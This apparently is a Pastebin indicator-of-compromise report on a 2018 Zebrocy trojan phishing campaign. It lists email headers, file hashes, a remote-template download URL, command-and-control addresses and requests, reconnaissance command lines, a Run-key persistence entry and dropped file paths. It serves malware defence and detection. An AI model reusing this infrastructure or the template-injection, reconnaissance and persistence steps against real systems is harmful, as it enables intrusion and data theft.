VRad

#Zebrocy_181018

Oct 18th, 2018
2,931
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Zebrocy #Trojan #xmltarget #W97M
  2.  
  3. https://pastebin.com/sXcERsQd
  4. exfiltrated data by @Jan0fficial https://pastebin.com/1mR0rZz7
  5. identificated by @Techhelplistcom
  6.  
  7. FAQ:
  8. https://radetskiy.wordpress.com/2018/10/19/ioc_zebrocy_181018/
  9. https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
  10. https://www.scmagazineuk.com/sofacy-rolls-zebrocy-toolkit-hit-government-targets/article/1486758
  11.  
  12. attack_vector
  13. --------------
  14. email attach .docx > xml.rels > GET .dotm > macro > exe
  15.  
  16. email_headers
  17. --------------
  18. Received: from st04.mi6.kiev.ua ([91.198.36.36])
  19. by out16.mi6.kiev.ua with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)
  20. (Exim 4.90_1)
  21. (envelope-from <upap.mfa.gov@i.ua>)
  22. id 1gD2qn-0006Tb-0i
  23. for user1@victim000; Thu, 18 Oct 2018 10:36:09 +0300
  24. Received: from web by st04.mi6.kiev.ua with local (Exim 4.80.1)
  25. (envelope-from <upap.mfa.gov@i.ua>)
  26. id 1gD2qm-0004NU-RT
  27. for user1@victim000; Thu, 18 Oct 2018 10:36:08 +0300
  28. To: user1@victim000
  29. Subject: 41500029
  30. From: Політичний департамент <upap.mfa.gov@i.ua>
  31. Date: Thu, 18 Oct 2018 10:36:08 +0300
  32. MIME-Version: 1.0
  33. X-Mailer: I.UA Mail System
  34. X-Server: st04.mi6.kiev.ua
  35. X-Sender-IP: 176.119.30.208
  36. X-User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
  37.  
  38. email_subjects
  39. --------------
  40. 41500029
  41.  
  42. files
  43. --------------
  44. SHA-256 c20e5d56b35992fe74e92aebb09c40a9ec4f3d9b3c2a01efbe761fa7921dd97f
  45. File name 1500029.docx
  46. File size 11.4 KB
  47.  
  48. SHA-256 86bb3b00bcd4878b081e4e4f126bba321b81a17e544d54377a0f590f95209e46
  49. File name Note_template.dotm
  50. File size 401 KB
  51.  
  52. SHA-256 c91843a69dcf3fdad0dac1b2f0139d1bb072787a1cfcf7b6e34a96bc3c081d65
  53. File name ~office.exe
  54. File size 353.5 KB
  55.  
  56. SHA-256 074a5836c5973bb53ab02c2bad66a4743b65c20fd6bf602cfaf09219f32d2426
  57. File name mslicsrv.exe (mcrthost.exe)
  58. File size 164 KB
  59.  
  60. activity
  61. **************
  62.  
  63. docx > settings.xml.rels > Target="http://185.203.118.198/documents/Note_template.dotm"
  64.  
  65. http://185.203.118.198/documents/Note_template.dotm
  66.  
  67. http://185.203.118.198/en_action_device/center_correct_customer/drivers-i7-x86.php?tbm=C4BA3647
  68.  
  69. netwrk
  70. --------------
  71. 185.203.118.198 OPTIONS /documents/ HTTP/1.1 Microsoft Office Protocol Discovery
  72. 185.203.118.198 OPTIONS / HTTP/1.1 Microsoft-WebDAV-MiniRedir/6.1.7601
  73. 185.203.118.198 GET /documents/Note_template.dotm HTTP/1.1 Mozilla/4.0
  74. 185.203.118.198 HEAD /documents/Note_template.dotm HTTP/1.1 Microsoft Office Existence Discovery
  75. 185.203.118.198 POST /en_action_device/center_correct_customer/drivers-i7-x86.php?tbm=AC38D1C7
  76. HTTP/1.0 (application/x-www-form-urlencoded) Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
  77.  
  78. comp
  79. --------------
  80. WINWORD.EXE 185.203.118.198:80:80
  81. svchost.exe 185.203.118.198:80:80
  82. WINWORD.EXE 185.203.118.198:80:80
  83. ~office.exe 185.203.118.198:80:80
  84. WINWORD.EXE 185.203.118.198:80:80
  85. mslicsrv.exe 138.204.170.189:443:443
  86. mslicsrv.exe 138.204.170.189:443:443
  87.  
  88. proc
  89. --------------
  90. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  91. C:\Users\operator\AppData\Roaming\Network\~office.exe
  92. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
  93. C:\Windows\SysWOW64\cmd.exe /c SYSTEMINFO & TASKLIST
  94. "C:\Users\operator\AppData\Roaming\Capability\mslicsrv.exe"
  95.  
  96. persist
  97. --------------
  98. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:11
  99. AudioDrv c:\users\operator\appdata\roaming\capability\mslicsrv.exe 15.10.2018 16:51
  100.  
  101. drop
  102. --------------
  103. C:\Users\operator\AppData\Roaming\Network\~office.exe
  104. C:\Users\operator\AppData\Roaming\Capability\mslicsrv.exe
  105.  
  106. # # #
  107. https://www.virustotal.com/#/file/c20e5d56b35992fe74e92aebb09c40a9ec4f3d9b3c2a01efbe761fa7921dd97f/details
  108. https://www.virustotal.com/#/file/86bb3b00bcd4878b081e4e4f126bba321b81a17e544d54377a0f590f95209e46/details
  109. https://www.virustotal.com/#/file/c91843a69dcf3fdad0dac1b2f0139d1bb072787a1cfcf7b6e34a96bc3c081d65/details
  110. https://www.virustotal.com/#/file/074a5836c5973bb53ab02c2bad66a4743b65c20fd6bf602cfaf09219f32d2426/details
  111.  
  112. https://analyze.intezer.com/#/analyses/6281721d-1810-487d-9fa1-fcea5e8dc109
  113. https://analyze.intezer.com/#/analyses/e0c0fd5b-3aec-4b81-a685-e2815fac6807
RAW Paste Data